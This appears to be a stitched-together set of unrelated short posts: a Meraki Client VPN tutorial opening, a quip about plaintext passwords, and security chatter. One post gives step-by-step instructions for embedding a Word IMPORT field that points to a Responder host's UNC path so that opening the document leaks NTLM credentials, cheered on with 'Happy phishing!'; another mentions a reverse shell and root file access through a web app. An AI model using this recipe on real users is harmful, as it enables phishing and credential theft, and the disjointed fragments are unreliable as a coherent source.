I should specify at the outset that this tutorial is designed for the “Meraki Cloud” authentication type with Client VPN configuration from Meraki Dashboard. This article assumes that you already have Client VPN configured...
Funny, I thought storing plain text passwords was a violation of #GDPR
Ofcourse they did.
Submitted this to MSRC, won't patch, it's a "feature"; Open Word -> CTRL + F9 -> IMPORT "\\\\Responder-IP\\1.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close. Open the document -> free credentials :) Happy phishing!
Couldn’t get in through SSH or a reverse shell, but when you have a web app installed that runs as root and lets you view/edit all files on the machine, might as well have.